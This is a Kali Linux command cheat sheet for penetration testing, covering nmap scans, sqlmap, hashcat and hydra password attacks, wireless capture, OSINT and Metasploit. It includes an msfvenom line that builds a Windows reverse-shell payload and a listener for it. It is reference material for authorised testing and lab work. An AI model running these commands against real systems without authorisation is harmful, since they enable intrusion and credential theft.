Kali Linux Commands Cheat Sheet

Last updated: July 2026
A reference for the commands you'll actually type during a Kali Linux session — system maintenance, network recon, web testing, password attacks, and Metasploit. For full installation steps, see Kali Linux: Install and First Steps.
System Update and Maintenance
# Update and upgrade — always use full-upgrade on Kali (rolling release)
sudo apt update && sudo apt full-upgrade -y
sudo apt autoremove -y
# Kali's post-install configuration tool (hardening, mirrors, metapackages, shell)
kali-tweaks
# List available Kali tool metapackages
apt-cache search kali-tools | sort
# Install a metapackage by discipline
sudo apt install -y kali-tools-web
sudo apt install -y kali-tools-wireless
sudo apt install -y kali-tools-passwords
sudo apt install -y kali-tools-exploitation
sudo apt install -y kali-tools-forensicsNetwork Reconnaissance
# Host discovery on a subnet
nmap -sn 192.168.1.0/24
# Standard recon: service versions + default scripts
nmap -sV -sC -p- 192.168.1.50
# OS fingerprinting
nmap -O 192.168.1.50
# Aggressive scan (OS, version, scripts, traceroute)
nmap -A 192.168.1.50
# Save results in all formats
nmap -sV -sC -oA scan_results 192.168.1.50
# Scan a target list
nmap -iL targets.txt -sV -oA resultsWeb Application Testing
# Nikto — quick web server scan
nikto -h http://target-ip
# Directory brute-forcing
feroxbuster -u http://target-ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# SQL injection testing
sqlmap -u "http://target-ip/page?id=1" --dbs
# Launch Burp Suite
burpsuite &Password Attacks
# Decompress the default wordlist
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
# Identify a hash type
hashid '$6$rounds=5000$...'
# Hashcat by hash mode
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt # MD5
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt # NTLM
hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt # SHA-512crypt
# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt
# Online service brute force (SSH example)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.50Metasploit Framework
# Initialize and verify the database
sudo msfdb init
msfconsole -q -x "db_status; exit"
# Inside msfconsole
msf6> search type:exploit platform:linux
msf6> search cve:2021-44228
msf6> use exploit/multi/handler
msf6> set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6> set LHOST 192.168.1.100
msf6> set LPORT 4444
msf6> run
# Generate a payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exeWireless Testing
# List wireless interfaces
iwconfig
# Kill interfering processes before monitor mode
sudo airmon-ng check kill
# Enable monitor mode
sudo airmon-ng start wlan0
# Scan for networks
sudo airodump-ng wlan0mon
# Capture a specific network
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Restore managed mode
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManagerService and Database Management
# PostgreSQL — required by Metasploit
sudo systemctl start postgresql
sudo systemctl enable postgresql
# Initialize or reinitialize the Metasploit database
sudo msfdb init
sudo msfdb reinit
# Check what's listening
sudo ss -tulpn
# List and manage services generally
systemctl list-units --type=service --state=running
sudo systemctl status sshCommon File Locations
# Wordlists
/usr/share/wordlists/rockyou.txt.gz
/usr/share/wordlists/dirbuster/
/usr/share/wordlists/dirb/
# Nmap scripts
/usr/share/nmap/scripts/
# Metasploit modules
/usr/share/metasploit-framework/modules/
# SecLists (if installed separately)
sudo apt install seclists
/usr/share/seclists/tmux for Long-Running Engagements
# Start a named session — survives SSH disconnects
tmux new -s engagement
# Detach without killing the session
# (inside tmux) Ctrl+b then d
# Reattach later
tmux attach -t engagement
# List sessions
tmux lsOSINT and Enumeration
# theHarvester — emails, subdomains, names from public sources
theHarvester -d target.com -b all
# Subdomain enumeration
sudo apt install -y amass
amass enum -d target.com
# WHOIS and DNS lookups
whois target.com
dig target.com ANY
dig -x 192.168.1.50 # reverse lookup
# Recon-ng — modular OSINT framework
recon-ng
[recon-ng][default]> marketplace install all
[recon-ng][default]> workspaces create target_engagementVPN for Lab Platforms
# Connect to HackTheBox / TryHackMe lab VPN
sudo apt install -y openvpn
sudo openvpn --config your-lab.ovpn
# Verify the tunnel
ip a show tun0Frequently Asked Questions
Is there an official PDF version of this cheat sheet?
Offensive Security doesn't publish one officially. This page covers the commands used most often across recon, web testing, password attacks, and Metasploit — bookmark it instead of hunting for a PDF that goes stale.
What's the difference between apt install and the kali-tools metapackages?
Metapackages like kali-tools-web install a curated group of tools for a discipline in one command instead of installing each tool individually by name.
Why does msfconsole say "No database connected"?
PostgreSQL isn't running or the Metasploit database wasn't initialized. Run sudo systemctl start postgresql followed by sudo msfdb reinit, then confirm with msfconsole -q -x "db_status; exit".
Where do I find more wordlists than the default rockyou.txt?
Install SecLists (sudo apt install seclists) for a much larger collection covering usernames, passwords, web content discovery, and fuzzing payloads, organized under /usr/share/seclists/.
